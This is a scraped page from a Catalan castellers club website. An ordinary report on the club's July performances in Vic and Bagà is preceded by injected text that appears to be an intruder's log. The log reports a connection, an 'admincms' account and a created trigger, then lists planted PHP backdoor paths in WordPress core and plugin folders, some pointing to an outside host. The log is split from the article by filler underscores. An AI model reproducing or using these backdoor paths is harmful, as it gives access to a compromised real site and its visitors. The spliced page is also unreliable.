Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?stream https://castellersdeberga.cat/wp-admin/media-new-ajax-ajax-ajax-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/update-ajax-response-stream-ajax-ajax-response.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/site-health-info-private-stream.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-meta-wp-core-wp-ajax-stream-stream-core-meta.php https://castellersdeberga.cat/wp-content/plugins/LayerSlider/index-wp-cron-private-cron.php https://castellersdeberga.cat/wp-includes/widgets/class-wp-widget-rss-ajax-response-cron-cron.php https://castellersdeberga.cat/wp-includes/ID3/module.audio-video.asf-stream-private-private-private-cron.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Vic i Bagà
 

Vic i Bagà


Vic i BagàEl cap de setmana de l’11 i 12 de juliol ha estat l’únic de la temporada que els Castellers de Berga hem fet dues actuacions. Dissabte a la tarda, actuàvem a la Plaça del Pes, a Vic, darrere l’ajuntament; diumenge al migdia, a la Plaça Galceran de Pinós de Bagà.
Dissabte 11 de juliol, vam actuar conjuntament amb els Sagals d’Osona, en la Diada de Vígilies de la Festa Major de Vic. A la capital d’Osona – on actuàvem per primera vegada – hi vam descarregar el 4 de 6 amb agulla, el 3 de 7 i el 3 de 6 amb agulla.
Diumenge 12 de juliol actuàvem per segon any consecutiu a la Plaça Porxada de Bagà, aquesta vegada també acompanyats dels Castellers de Santpedor, que ja ens hi van acompanyar el 2014. A Bagà hem posat una marxa més i hi hem descarregat el 3 de 7, el 4 de 7 i el 4 de 6 amb agulla. El 3 de 6 dels de Santpedor que havia de ser el seu tercer castell ha quedat només en carregat.
Dos assajos i celebrem el nostre tercer aniversari. Dissabte 18 de juliol, a la Plaça Viladomat, a Berga, estarem acompanyats pels Salats de Súria i els nostres padrins els Castellers de Sabadell. Castells, sopar, sobretaula, espectacle i música en directe per celebrar els nostres tres anys de vida.